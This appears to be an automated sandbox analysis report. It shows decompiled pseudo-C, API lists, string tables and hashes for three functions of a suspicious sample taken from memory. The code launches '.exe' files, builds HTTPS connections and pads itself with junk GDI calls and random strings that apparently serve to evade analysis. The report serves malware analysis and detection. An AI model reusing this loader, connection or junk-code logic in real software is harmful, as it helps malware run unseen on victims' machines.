				_v232 = 0;
				_v240 = 0;
				_v252 = 0;
				if( *_a4 <= 1) {
					L3:
					_t69 =  *0xef56a8; // 0xf00000
					E00ECE851( &_v132, 2, 0x14, 0x1e, _t69 + 0x648);
					_t74 = E00ED00D0( *((intOrPtr*)( *((intOrPtr*)(_t121 + 4)))),  &_v228);
					_t153 = _t152 + 0x18;
					_v220 = _t74;
					if(_t74 != 0) {
						_v240 = E00ECEABC(_v232);
						_pop(_t125);
						_t77 = E00ED0A9D(_t125,  &_v236);
						_v252 = _t77;
						if(_t77 != 0) {
							_v244 = 0;
							if(_v236 > 0) {
								while(_v224 == 0) {
									_push(0);
									_push(L".exe");
									_push( &_v132);
									_push("\\");
									_t144 = E00ECE9D2( *((intOrPtr*)(_v252 + _v244 * 4)));
									_t153 = _t153 + 0x14;
									_v248 = _t144;
									if(_t144 != 0) {
										_t100 = E00ED32EB(_t144, _v220, _v228);
										_t153 = _t153 + 0xc;
										if(_t100 >= 0) {
											if(_v240 == 0) {
												Arc(0, 0x36, 0x44, 0x1e, 0xe, 0x2c, 0x1a, 0x63, 2);
												_t102 = E00ECEC9D(_t144);
											} else {
												_push(0);
												_push(_v240);
												_push(" ");
												_t102 = E00ECE9D2(_t144);
												_t153 = _t153 + 0x10;
											}
											_v292 = _t102;
											if(_t102 == 0) {
												goto L9;
											} else {
												_t107 = E00ECDD64(_v292,  &_v252, 0x2710, 1);
												_t155 = _t153 + 0x10;
												if(_t107 != 0) {
													L20:
													_v260 = 1;
													_v296 = 0;
													E00ECD1EA( &_v292, 0xfffffffe);
													_t110 =  &_v284;
												} else {
													_t113 = E00ECDD64(_v292,  &_v252, 0x2710, 0);
													_t155 = _t155 + 0x10;
													if(_t113 != 0) {
														goto L20;
													} else {
														_v296 = 0xfffffff9;
														E00ECD1EA( &_v284, 0xfffffffe);
														_t110 =  &_v292;
													}
												}
												E00ECD1EA(_t110, 0xfffffffe);
												_t153 = _t155 + 0x10;
											}
										} else {
											_v260 = 0xfffffffb;
											goto L10;
										}
									} else {
										L9:
										_v296 = 0xfffffffd;
										L10:
										E00ECD1EA( &_v284, 0xfffffffe);
									}
									_v280 = _v280 + 1;
									if(_v280 < _v272) {
										continue;
									}
									goto L23;
								}
							}
						}
					} else {
						_v260 = 0xfffffffe;
					}
					L23:
					E00ECD1EA( &_v240, 0xfffffffe);
					E00ECD1EA( &_v232, 0xffffffff);
					E00ECD1EA( &_v220, _v228);
					_t154 = _t153 + 0x18;
					ArcTo(0, 0x55, 0xd, 0x2b, 0x34, 0x2d, 0x13, 0x15, 0x42);
					if(_v288 != 0) {
						GetLastError();
						_t89 = E00ECFE78("tyiOQSuNAypyfoaReIrScr7hwcHzva4i 9tJCanyECr82r469dgTyvfPnJt5myFbD,P2.4NDbujvDnIvtH6M D8E6ElYnZU .s5Xy8A5Mri8QMOdU 2e05Iie1DGR5kr4QW xdF3z8vxS.WvhReYNuqhufvfrhp.Amdgd9qbEgjm4dETiU9tWy5hUnL4jFSywt91G5wdI0oHaLDmq");
						_t142 = 0xf;
						if(_t89 <= _t142) {
							_t142 = _t89;
						}
						_t123 = 0;
						_v233 = 0;
						if(_t142 > 0) {
							do {
								_t57 = _t123 + 0x42; // 0x42
								 *((char*)(_t154 + _t123 + 0x44)) = _t57;
								MultiByteToWideChar(0, 0,  &_v248, 0xffffffff,  &_v232, 0x20);
								_t123 = _t123 + 1;
							} while (_t123 < _t142);
						}
						_t124 = _v272;
						if(_t124 > 0) {
							_t143 = _v288;
							do {
								E00ECD1EA(_t143, 0xfffffffe);
								_t143 = _t143 + 4;
								_t124 = _t124 - 1;
							} while (_t124 != 0);
						}
						E00ECD1EA( &_v288, 0);
						_t121 = _a4;
					}
					E00ECEA28(_t121, _t121 + 4);
					_t87 = _v296;
				} else {
					_t119 = E00ECE77F( *((intOrPtr*)(_t121 + 4)) + 4, _t68 - 1);
					_v232 = _t119;
					if(_t119 != 0) {
						goto L3;
					} else {
						_t87 = 0xfffffffd;
					}
				}
				return _t87;
			}

0x00ec4e9d
0x00ec4ea4
0x00ec4ea7
0x00ec4ead
0x00ec4eb1
0x00ec4eb5
0x00ec4eb9
0x00ec4ebd
0x00ec4ec1
0x00ec4ec8
0x00ec4eea
0x00ec4eea
0x00ec4f02
0x00ec4f11
0x00ec4f16
0x00ec4f19
0x00ec4f1f
0x00ec4f37
0x00ec4f3b
0x00ec4f41
0x00ec4f47
0x00ec4f4d
0x00ec4f53
0x00ec4f5b
0x00ec4f61
0x00ec4f6f
0x00ec4f70
0x00ec4f7c
0x00ec4f81
0x00ec4f8e
0x00ec4f90
0x00ec4f93
0x00ec4f99
0x00ec4fbf
0x00ec4fc4
0x00ec4fc9
0x00ec4fd9
0x00ec5001
0x00ec5008
0x00ec4fdb
0x00ec4fdb
0x00ec4fdc
0x00ec4fe0
0x00ec4fe6
0x00ec4feb
0x00ec4feb
0x00ec500e
0x00ec5014
0x00000000
0x00ec5016
0x00ec5027
0x00ec502c
0x00ec5031
0x00ec5064
0x00ec506b
0x00ec5073
0x00ec5077
0x00ec507c
0x00ec5033
0x00ec503e
0x00ec5043
0x00ec5048
0x00000000
0x00ec504a
0x00ec5051
0x00ec5059
0x00ec505e
0x00ec505e
0x00ec5048
0x00ec5083
0x00ec5088
0x00ec5088
0x00ec4fcb
0x00ec4fcb
0x00000000
0x00ec4fcb
0x00ec4f9b
0x00ec4f9b
0x00ec4f9b
0x00ec4fa3
0x00ec4faa
0x00ec4fb0
0x00ec508b
0x00ec5097
0x00000000
0x00000000
0x00000000
0x00ec5097
0x00ec4f61
0x00ec4f5b
0x00ec4f21
0x00ec4f21
0x00ec4f21
0x00ec509d
0x00ec50a4
0x00ec50b0
0x00ec50be
0x00ec50c3
0x00ec50d7
0x00ec50e1
0x00ec50e3
0x00ec50ee
0x00ec50f6
0x00ec50f9
0x00ec50fb
0x00ec50fb
0x00ec50fd
0x00ec50ff
0x00ec5106
0x00ec5108
0x00ec510a
0x00ec510d
0x00ec511f
0x00ec5125
0x00ec5126
0x00ec5108
0x00ec512a
0x00ec5130
0x00ec5132
0x00ec5136
0x00ec5139
0x00ec513f
0x00ec5142
0x00ec5143
0x00ec5136
0x00ec514c
0x00ec5151
0x00ec5155
0x00ec515c
0x00ec5161
0x00ec4eca
0x00ec4ed3
0x00ec4eda
0x00ec4ee0
0x00000000
0x00ec4ee2
0x00ec4ee4
0x00ec4ee4
0x00ec4ee0
0x00ec516c

APIs

ArcTo.GDI32(00000000,00000055,0000000D,0000002B,00000034,0000002D,00000013,00000015,00000042), ref: 00EC50D7
GetLastError.KERNEL32 ref: 00EC50E3
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 00EC511F

Strings

tyiOQSuNAypyfoaReIrScr7hwcHzva4i 9tJCanyECr82r469dgTyvfPnJt5myFbD,P2.4NDbujvDnIvtH6M D8E6ElYnZU .s5Xy8A5Mri8QMOdU 2e05Iie1DGR5kr4QW xdF3z8vxS.WvhReYNuqhufvfrhp.Amdgd9qbEgjm4dETiU9tWy5hUnL4jFSywt91G5wdI0oHaLDmq, xrefs: 00EC50E9
.exe, xrefs: 00EC4F70

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: ByteCharErrorLastMultiWide
String ID: .exe$tyiOQSuNAypyfoaReIrScr7hwcHzva4i 9tJCanyECr82r469dgTyvfPnJt5myFbD,P2.4NDbujvDnIvtH6M D8E6ElYnZU .s5Xy8A5Mri8QMOdU 2e05Iie1DGR5kr4QW xdF3z8vxS.WvhReYNuqhufvfrhp.Amdgd9qbEgjm4dETiU9tWy5hUnL4jFSywt91G5wdI0oHaLDmq
API String ID: 203985260-2184043576
Opcode ID: 8dcb329b22a25126610f741021374a4099e187e959968dcf2af832902b7fa440
Instruction ID: 8f5b4ac404e20a19f94734ed76e59caf3b8a685b245891eea260238010b68f6b
Opcode Fuzzy Hash: 8dcb329b22a25126610f741021374a4099e187e959968dcf2af832902b7fa440
Instruction Fuzzy Hash: F881F472508300AFD210DF14CE86F5EB7E8EB89724F141A1EF5A4F61D1D772D6468792

Uniqueness

Uniqueness Score: -1.00%

Function 00EC5D6F, Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 219
fileCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00EC5D6F(intOrPtr __edx, void* __fp0, intOrPtr* _a4) {
				short _v68;
				char _v100;
				char _v101;
				char _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				char _v140;
				void* __edi;
				intOrPtr _t51;
				char _t56;
				signed int _t57;
				signed int _t58;
				void* _t61;
				intOrPtr _t63;
				signed int _t66;
				signed int _t69;
				signed int _t71;
				intOrPtr _t72;
				intOrPtr _t81;
				signed int _t83;
				signed int _t85;
				intOrPtr _t86;
				signed int _t88;
				void* _t91;
				intOrPtr _t93;
				signed int _t95;
				signed int _t97;
				intOrPtr _t98;
				signed int _t104;
				void* _t108;
				void* _t114;
				void* _t123;
				intOrPtr _t126;
				char* _t128;
				signed int _t132;
				intOrPtr* _t134;
				signed int _t136;
				void* _t138;
				void* _t139;
				void* _t141;

				_t126 = __edx;
				_t138 = (_t136 & 0xfffffff8) - 0x8c;
				_v136 = 5;
				_v128 = E00ED172C(0xa);
				_v124 = E00ED1277(__edx, 3);
				_t51 =  *0xef56a8; // 0xf00000
				_v120 = _t126;
				if(( *(_t51 + 0x1898) & 0x00000001) != 0) {
					_t104 = E00EDCF06(_t51 + 0x648, __fp0, _t51 + 0x648, 0xf, 0x23);
					_t138 = _t138 + 0xc;
					_v136 = _t104;
				}
				_t134 = _a4;
				_t128 =  &_v100;
				E00ECE245( *(_t134 + 4) & 0x0000ffff, _t128, 0xa);
				_push(0);
				_push( *((intOrPtr*)( *((intOrPtr*)(_t134 + 8)))));
				_push(_t128);
				_push(":");
				_push( *_t134);
				_t56 = E00ECE7FC("https://");
				_t139 = _t138 + 0x18;
				_v140 = _t56;
				if(_t56 != 0) {
					_t57 = E00ED1447(_t126,  *0xef5758, 0x31);
					_pop(_t114);
					__eflags = _t57;
					if(__eflags != 0) {
						L19:
						_t106 = _v128;
						__eflags = _v128;
						if(__eflags == 0) {
							_t106 = "b";
						}
						_t58 = E00ED3478(_t114, __eflags);
						asm("sbb eax, eax");
						_t61 = E00ED23E6(_t126);
						_t63 =  *0xef56a8; // 0xf00000
						_t66 = E00EDB6E7(_t126, __eflags, _v140,  *_t134,  *(_t134 + 4) & 0x0000ffff, _t63 + 0x100c, _t106,  *0xef4000 & 0x0000ffff, _t61,  ~( ~_t58), _v124, _v120,  *((intOrPtr*)(_t134 + 0xc)));
						_v132 = _t66;
						__eflags = _t66 - 1;
						if(_t66 != 1) {
							__eflags = _t66;
							if(__eflags != 0) {
								if(__eflags >= 0) {
									goto L29;
								}
								_push(1);
								L28:
								_t71 = _v136 * 0x3e8;
								__eflags = _t71;
								_t72 =  *0xef56c8; // 0x520f6c8
								 *((intOrPtr*)(_t72 + 0xb8))(_t71);
								goto L29;
							}
							E00EC6433(1,  *(_t134 + 4),  *_t134);
							_push(0);
							goto L25;
						} else {
							E00EC6433(1,  *(_t134 + 4),  *_t134);
							CreateEnhMetaFileA(0, "zVYi.5BT42sagXfXCFsoYRPE2QnSxoX  W26n F0FB4Qby7oUPm3KFEp qrfCsC CQKL0u LdnSdL0WR1QE0gb4T7YlFuSlqWUJNjVhuFJj11I3gX am3 TlUX3 39y 8sl3v CMRQ,aYcqyWbbl1VXnO03sVxZO4dT8L0ey7EA0,g8pe.44lZi34.IDXl6aRbeVicq83ocXfSMPuOv,bxszRtfkrLUzYiVXLWGWvuc2iDGmE4q0dGQM aQiwIU2JpgGvk wAzHu  K5CZlNlZ3trB0QAedf2zQUp1QZO7K YJyaJEd 3WSxZRI rZnpjdMUCJcrCUJo CD wKpEJuFfnyAnrMW4DZILHFUrajWOcQT4ffitWhzYzGv5hF P.4ez7HPTTc yv 64NnjdDwh01Jeo0Xq2tmdgjVFBW5.Uf,FfnpfMZEJt 5LO.8EG.dCf8Nec AEsz7IcEp1gwPR2P0XxvFkMz3rTmH9a6arILQVRhG1xRYAi LnO.Stjxw21,6IIiUJ2J1o6IEu ,z76uyoAmZyG9Y7tCRfkXdVw.SeBDW,ACqC2sfcMUWN z.mbWCICh9uEDLdzb46KgXC30US2BrN6tX6aw7b6Ow,gxW05FARmLuABIMs6GXV5Pm0d6bBcV0TrwKqUACi1Dy3JImNbY15NBTHEQnJuuMhSHPnE3GQPq4rUyCfSZIxaJeNnYUx Co", 0, 0);
							_push(1);
							L25:
							E00EC64B7(_t126);
							L29:
							E00ECD1EA( &_v140, 0xffffffff);
							_t69 = _v132;
							goto L30;
						}
					}
					_t81 =  *0xef56a8; // 0xf00000
					_t83 = E00EDB8CB(_t126, __eflags, _v140, _t81 + 0x100c,  *((intOrPtr*)(_t134 + 0xc)));
					_t141 = _t139 + 0xc;
					_v132 = _t83;
					GetLastError();
					_t85 = E00ECFE78("ZesgpNnQwvInop.a8NzFwiP o2umYO.8wN1p");
					_pop(_t122);
					__eflags = _t85 - 0xf;
					if(_t85 <= 0xf) {
						_t132 = _t85;
					} else {
						_t132 = 0xf;
					}
					_t108 = 0;
					_v101 = 0;
					__eflags = _t132;
					if(_t132 == 0) {
						L10:
						__eflags = _v132;
						if(_v132 >= 0) {
							_t86 =  *((intOrPtr*)(_t134 + 8));
							__eflags =  *(_t86 + 4);
							if( *(_t86 + 4) == 0) {
								_t97 = E00ED1447(_t126,  *0xef5758, 0x31);
								_pop(_t122);
								__eflags = _t97;
								if(_t97 == 0) {
									_t98 = E00EC897B(_t126);
									_t122 =  *((intOrPtr*)(_t134 + 8));
									 *((intOrPtr*)( *((intOrPtr*)(_t134 + 8)) + 4)) = _t98;
								}
							}
							_t109 = _v128;
							__eflags = _v128;
							if(__eflags == 0) {
								_t109 = "b";
							}
							_t88 = E00ED3478(_t122, __eflags);
							asm("sbb eax, eax");
							_t91 = E00ED23E6(_t126);
							_t93 =  *0xef56a8; // 0xf00000
							_t95 = E00EDBA2C(_t126, __eflags, _v140, _t93 + 0x100c, _t109,  *0xef4000 & 0x0000ffff, _t91,  ~( ~_t88), _v124, _v120,  *((intOrPtr*)( *((intOrPtr*)(_t134 + 8)) + 4)),  *((intOrPtr*)(_t134 + 0xc)));
							_t139 = _t141 + 0x28;
							_v132 = _t95;
							__eflags = _t95;
							if(_t95 != 0) {
								goto L11;
							} else {
								_push(_t95);
								_t123 = 0x31;
								E00ED19A7(_t123);
								_t114 = 1;
								goto L19;
							}
						}
						L11:
						_push(1);
						goto L28;
					} else {
						do {
							_t18 = _t108 + 0x42; // 0x42
							 *((char*)(_t141 + _t108 + 0x2c)) = _t18;
							MultiByteToWideChar(0, 0,  &_v116, 0xffffffff,  &_v68, 0x20);
							_t108 = _t108 + 1;
							__eflags = _t108 - _t132;
						} while (_t108 < _t132);
						goto L10;
					}
				} else {
					_t69 = 0xffffffec;
					L30:
					return _t69;
				}
			}

0x00ec5d6f
0x00ec5d75
0x00ec5d80
0x00ec5d90
0x00ec5d99
0x00ec5d9d
0x00ec5daa
0x00ec5dae
0x00ec5dba
0x00ec5dbf
0x00ec5dc2
0x00ec5dc2
0x00ec5dc6
0x00ec5dcf
0x00ec5dd3
0x00ec5ddc
0x00ec5dde
0x00ec5de2
0x00ec5de3
0x00ec5de8
0x00ec5def
0x00ec5df4
0x00ec5df7
0x00ec5dfd
0x00ec5e0f
0x00ec5e15
0x00ec5e16
0x00ec5e18
0x00ec5f26
0x00ec5f26
0x00ec5f2a
0x00ec5f2c
0x00ec5f2e
0x00ec5f2e
0x00ec5f3e
0x00ec5f45
0x00ec5f4a
0x00ec5f58
0x00ec5f6f
0x00ec5f7a
0x00ec5f7e
0x00ec5f80
0x00ec5fa4
0x00ec5fa6
0x00ec5fc0
0x00000000
0x00000000
0x00ec5fc2
0x00ec5fc3
0x00ec5fc7
0x00ec5fc7
0x00ec5fce
0x00ec5fd3
0x00000000
0x00ec5fd3
0x00ec5fb0
0x00ec5fb6
0x00000000
0x00ec5f82
0x00ec5f8a
0x00ec5f9a
0x00ec5fa0
0x00ec5fb8
0x00ec5fb8
0x00ec5fd9
0x00ec5fe0
0x00ec5fe5
0x00000000
0x00ec5fea
0x00ec5f80
0x00ec5e21
0x00ec5e30
0x00ec5e35
0x00ec5e38
0x00ec5e3c
0x00ec5e47
0x00ec5e4c
0x00ec5e4d
0x00ec5e50
0x00ec5e57
0x00ec5e52
0x00ec5e54
0x00ec5e54
0x00ec5e59
0x00ec5e5b
0x00ec5e60
0x00ec5e62
0x00ec5e88
0x00ec5e88
0x00ec5e8d
0x00ec5e96
0x00ec5e99
0x00ec5e9d
0x00ec5ea7
0x00ec5ead
0x00ec5eae
0x00ec5eb0
0x00ec5eb2
0x00ec5eb7
0x00ec5eba
0x00ec5eba
0x00ec5eb0
0x00ec5ebd
0x00ec5ec1
0x00ec5ec3
0x00ec5ec5
0x00ec5ec5
0x00ec5edb
0x00ec5ee2
0x00ec5ee7
0x00ec5ef5
0x00ec5f05
0x00ec5f0a
0x00ec5f0d
0x00ec5f11
0x00ec5f13
0x00000000
0x00ec5f19
0x00ec5f19
0x00ec5f1e
0x00ec5f1f
0x00ec5f25
0x00000000
0x00ec5f25
0x00ec5f13
0x00ec5e8f
0x00ec5e8f
0x00000000
0x00ec5e64
0x00ec5e64
0x00ec5e66
0x00ec5e69
0x00ec5e7d
0x00ec5e83
0x00ec5e84
0x00ec5e84
0x00000000
0x00ec5e64
0x00ec5dff
0x00ec5e01
0x00ec5feb
0x00ec5ff1
0x00ec5ff1

APIs

GetLastError.KERNEL32(?,?,?,?,?,0000000A), ref: 00EC5E3C
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 00EC5E7D

Part of subcall function 00EC897B: BitBlt.GDI32(00000000,00000007,00000024,0000004B,0000005E,00000000,0000001B,00000019,00000044), ref: 00EC89FF
Part of subcall function 00EC897B: IsValidCodePage.KERNEL32(0000002A,?,?,?,?,?,00000000,?,00000000), ref: 00EC8A1F
Part of subcall function 00EC897B: BitBlt.GDI32(00000000,00000061,00000027,0000002B,00000036,00000000,00000040,0000003B,00000025), ref: 00EC8A57

CreateEnhMetaFileA.GDI32(00000000,zVYi.5BT42sagXfXCFsoYRPE2QnSxoX W26n F0FB4Qby7oUPm3KFEp qrfCsC CQKL0u LdnSdL0WR1QE0gb4T7YlFuSlqWUJNjVhuFJj11I3gX am3 TlUX3 39y 8sl3v CMRQ,aYcqyWbbl1VXnO03sVxZO4dT8L0ey7EA0,g8pe.44lZi34.IDXl6aRbeVicq83ocXfSMPuOv,bxszRtfkrLUzYiVXLWGWvuc2iDGmE4q0dGQM aQiwIU2JpgG,00000000,00000000), ref: 00EC5F9A

Strings

https://, xrefs: 00EC5DEA
zVYi.5BT42sagXfXCFsoYRPE2QnSxoX W26n F0FB4Qby7oUPm3KFEp qrfCsC CQKL0u LdnSdL0WR1QE0gb4T7YlFuSlqWUJNjVhuFJj11I3gX am3 TlUX3 39y 8sl3v CMRQ,aYcqyWbbl1VXnO03sVxZO4dT8L0ey7EA0,g8pe.44lZi34.IDXl6aRbeVicq83ocXfSMPuOv,bxszRtfkrLUzYiVXLWGWvuc2iDGmE4q0dGQM aQiwIU2JpgG, xrefs: 00EC5F94
ZesgpNnQwvInop.a8NzFwiP o2umYO.8wN1p, xrefs: 00EC5E42

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: ByteCharCodeCreateErrorFileLastMetaMultiPageValidWide
String ID: ZesgpNnQwvInop.a8NzFwiP o2umYO.8wN1p$https://$zVYi.5BT42sagXfXCFsoYRPE2QnSxoX W26n F0FB4Qby7oUPm3KFEp qrfCsC CQKL0u LdnSdL0WR1QE0gb4T7YlFuSlqWUJNjVhuFJj11I3gX am3 TlUX3 39y 8sl3v CMRQ,aYcqyWbbl1VXnO03sVxZO4dT8L0ey7EA0,g8pe.44lZi34.IDXl6aRbeVicq83ocXfSMPuOv,bxszRtfkrLUzYiVXLWGWvuc2iDGmE4q0dGQM aQiwIU2JpgG
API String ID: 2510407887-1882337147
Opcode ID: fc6e138cbe7a53cff837dbba4591e240681cb71acf97e61b059e5182546c1734
Instruction ID: eb92d938c8b1f71a4ffac03f4a314d705a97da4b3bcd00c78fc0b9b4b8cefb7a
Opcode Fuzzy Hash: fc6e138cbe7a53cff837dbba4591e240681cb71acf97e61b059e5182546c1734
Instruction Fuzzy Hash: FA71F272208701AFD7149F64DD42F3A77D8EB98710F10582EF694F62A2E772E986CB11

Uniqueness

Uniqueness Score: -1.00%

Function 00EC233C, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 141
filewindowCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00EC233C(signed int __edx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				char _v324;
				signed int _t61;
				signed int _t73;
				signed int _t77;
				signed int _t80;
				signed int _t83;
				signed int _t87;
				void* _t91;
				void* _t95;
				signed int _t103;
				signed int _t104;
				signed int _t105;
				signed int _t107;

				_t107 = __edx;
				_v28 = _v28 & 0x00000000;
				_v16 = _v16 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				_v8 = _v8 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v20 = _v20 & 0x00000000;
				_v32 = _v32 & 0x00000000;
				_t61 = E00ECEF54(0, _a4, E00ECFE78(_a4));
				_pop(_t95);
				_v24 = _t61;
				_v16 = E00EC111F(_t61, _t95, _v24);
				BitBlt(0, 0x3b, 0x42, 0x23, 7, 0, 0x10, 0x2d, 0x59);
				if(_v16 >= 0) {
					E00EC2192(_v16);
				}
				_v32 = E00EC24CE(_t107,  &_v20,  &_v8);
				if(_v32 != 0) {
					_v16 = _v16 & 0x00000000;
					while(1) {
						__eflags = _v16 - _v20;
						if(_v16 >= _v20) {
							break;
						}
						__imp__GetCPInfoExA(0x54, 0x2f,  &_v324);
						_t77 = _v16 * 0x18;
						_t103 = _v32;
						__eflags =  *((intOrPtr*)(_t103 + _t77)) - _v24;
						if( *((intOrPtr*)(_t103 + _t77)) != _v24) {
							_t80 = _v16 + 1;
							__eflags = _t80;
							_v16 = _t80;
							continue;
						}
						ArcTo(0, 0x10, 0x1a, 0x39, 0x3a, 0x54, 0x28, 0x47, 0x34);
						_t83 = _v16 * 0x18;
						_t104 = _v32;
						__eflags =  *(_t104 + _t83 + 4);
						if( *(_t104 + _t83 + 4) != 0) {
							while(1) {
								__eflags = 0;
								if(0 == 0) {
									break;
								}
							}
							__eflags = 0;
							if(0 != 0) {
								CancelDC(0);
							}
							_t87 = _v16 * 0x18;
							_t105 = _v32;
							_t43 = _t105 + _t87 + 4;
							 *_t43 =  *(_t105 + _t87 + 4) & 0x00000000;
							__eflags =  *_t43;
							_v28 = 1;
							L17:
							break;
						} else {
							goto L9;
						}
						while(1) {
							L9:
							__eflags = 0;
							if(0 == 0) {
								break;
							}
						}
						goto L17;
					}
					__eflags = _v16 - _v20;
					if(_v16 != _v20) {
						__eflags = _v28;
						if(__eflags != 0) {
							_t73 = E00EC1B45(_t107, __eflags, _v32, _v20);
							__eflags = _t73;
							if(_t73 >= 0) {
								_v12 = 1;
							} else {
								_v12 = 0xfffffffd;
							}
						}
						while(1) {
							L27:
							__eflags = 0;
							if(0 == 0) {
								break;
							}
						}
						E00EC1000( &_v32, _v20);
						return _v12;
					} else {
						goto L20;
					}
					while(1) {
						L20:
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					_v12 = 0xfffffffc;
					goto L27;
				} else {
					CreateEnhMetaFileA(0, "hfcWMuhsA,,cXX91 zcJNjafcvw8xkMcDvVohYWz2C3l i40r56FRmzhZWcxeGyc5XOWjjZ ztnZC4Thm43ypMt63, QJTMly MoVDDmhl1O 9sgVzUiz8oykEYEH.icnf2z8l9 6BCM.BpSAU14X5CQa7,4 J1iAU1uyk Yx8YhQmkAynSDQn91PJgHDgfFdkBZxPPgUdyWqCBazC9r.TP4 xqfEoyWrlw15OJ.f9jCcLDj8 8Mg,VeMVg2hMeUsiqrGNG5J20DiDZg5QC5CMYpzBHLXxsM9S8 6bIIaRu9aUFd1 vKn4s8D2FsL25j0SbK0ElgY9f4XGUr6WQZ1Tf9a88BBVAJ5DLYTkmzaFK9YCpqeXZORBR8 qjS nTz8neyHwQT1aBt3s7Fz8nyxbsfcR43SM k4S4erv55tuaIgDcLsTSzB97RFrlz7d.JhENoAh4Ih4tNtsK PGpIvIM8fQeMGYvTkdAb9,F32kpl9WZY3irdNW0x8CGKC z5.67ay pE2gvEbYh7JCz7NAXg3eZnVJHwpk.Nq8WDsQmyLvl Bxc  I26IS6RIJHjDIcj5ppVWB76qNQefhBb8BdyfyrCAPxtzNoxLQEFyzGnTjKpnnKIGw6pzBp,kD2QjDu41exhwi,TBlVcDkUE3 Sd0m9O yE,bgzFTj5ZMaRCHIJpT7tsUPIF2HmhISBbHZfypsRxJ3xkkUczlfsQ1yiZt4Moc7XKIv5Jq4m4KT1C3XuqA1bnS,sabo OvoQX0v.q9PAl.DuAwEjXaHF4aDulKW.q Dl7 fV96FlZDny1HDZpJS1SU da8dLx fbaG3utaA9dQRekUcHJBtAxr9AX0s0lGT fpZBH.xEznP Rd8VN50 5Irz3HO8pFQyIGYXNaoVKY3QljIOj64Ej2b PPB1Fjrj8,2juSTbz 91lywYpNhGKzis7OqTtraF5xU1XbrrkKOozGE8M5 iRczn7Jhlel73AkMPdsQc.djAZmdUU .N4c0NH7A Kvejqtvgx7x7s bj y2Xw9JvuUaqxq.SdjUEY7v Vl. UfGh2qPOyN,P1T88P4USYD2.s PW D,bek NUhqjHN0NWi7DSbKQ4wHZG.LG0N,,xt.Hg75 2rv1AZMcGiQn0FFTwhP bk3VstyY2X7LJIl.SKK88ct f  CID9xUZPswGwuwxXsHt6xPN9oNQMU4n 2HI4gbKMTYroe3C 7jgAaR28 6huKdl7lKyXt3QgwMqeLjksb8nwzhfKN2gRUM2Y8x9pB6 bVNTe5u7RBKWbC4I,v6sZrUWj6MwgDRusp54VhPn28jgtA.1 fdb9iNtY.enA3tU CL68h8SN5wOxS1IOsouQjo6i47tqIkqBUMq i7fZLdxsbHHJBFU3VrruvjQ OcLC63fIPF.RMfolzJxStWJ2anDHlkjmBm.2rBppXebqop HcSE9yvO2yxkqSmU4P hGHyqTMYmDX33Nu1OJMIzu2Fy9YEJOTTgbc9JNm98NSU9Op2nGae0 oOjzPHUHuZeew.AIIO  ck5exVGQYP57Mx,BELl7b04CuBCEBAjUm r8pAMpjPre,za4gf7nzr5EnicPX93.r0lzhKy6U9yk0LhQbsEAV8Jcnl,zYg .49IIovz2YaZdGHcQc8t5QGYLTo9MC89 Ti  pWpV 9ziVjL9eA6dqLIJbH", 0, 0);
					_t91 = 0xfffffffe;
					return _t91;
				}
			}

0x00ec233c
0x00ec2345
0x00ec2349
0x00ec234d
0x00ec2351
0x00ec2355
0x00ec2359
0x00ec235d
0x00ec2370
0x00ec2376
0x00ec2377
0x00ec2383
0x00ec2398
0x00ec23a2
0x00ec23a7
0x00ec23ac
0x00ec23bc
0x00ec23c3
0x00ec23de
0x00ec23eb
0x00ec23ee
0x00ec23f1
0x00000000
0x00000000
0x00ec2402
0x00ec240b
0x00ec240e
0x00ec2414
0x00ec2417
0x00ec23e7
0x00ec23e7
0x00ec23e8
0x00000000
0x00ec23e8
0x00ec242b
0x00ec2434
0x00ec2437
0x00ec243a
0x00ec243f
0x00ec2449
0x00ec2449
0x00ec244b
0x00000000
0x00000000
0x00ec244d
0x00ec244f
0x00ec2451
0x00ec2455
0x00ec2455
0x00ec245e
0x00ec2461
0x00ec2464
0x00ec2464
0x00ec2464
0x00ec2469
0x00ec2470
0x00000000
0x00000000
0x00000000
0x00000000
0x00ec2441
0x00ec2441
0x00ec2441
0x00ec2443
0x00000000
0x00000000
0x00ec2445
0x00000000
0x00ec2447
0x00ec247a
0x00ec247d
0x00ec248e
0x00ec2492
0x00ec249a
0x00ec24a1
0x00ec24a3
0x00ec24ae
0x00ec24a5
0x00ec24a5
0x00ec24a5
0x00ec24a3
0x00ec24b5
0x00ec24b5
0x00ec24b5
0x00ec24b7
0x00000000
0x00000000
0x00ec24b9
0x00ec24c2
0x00000000
0x00000000
0x00000000
0x00000000
0x00ec247f
0x00ec247f
0x00ec247f
0x00ec2481
0x00000000
0x00000000
0x00ec2483
0x00ec2485
0x00000000
0x00ec23c5
0x00ec23d0
0x00ec23d8
0x00000000
0x00ec23d8

APIs

BitBlt.GDI32(00000000,0000003B,00000042,00000023,00000007,00000000,00000010,0000002D,00000059), ref: 00EC2398
CreateEnhMetaFileA.GDI32(00000000,hfcWMuhsA,,cXX91 zcJNjafcvw8xkMcDvVohYWz2C3l i40r56FRmzhZWcxeGyc5XOWjjZ ztnZC4Thm43ypMt63, QJTMly MoVDDmhl1O 9sgVzUiz8oykEYEH.icnf2z8l9 6BCM.BpSAU14X5CQa7,4 J1iAU1uyk Yx8YhQmkAynSDQn91PJgHDgfFdkBZxPPgUdyWqCBazC9r.TP4 xqfEoyWrlw15OJ.f9jCcLDj8 8Mg,VeMVg2hMeUsiqr,00000000,00000000), ref: 00EC23D0

Part of subcall function 00EC2192: CancelDC.GDI32(00000000,00000000,00EF56E8), ref: 00EC2295

GetCPInfoExA.KERNEL32(00000054,0000002F,?), ref: 00EC2402
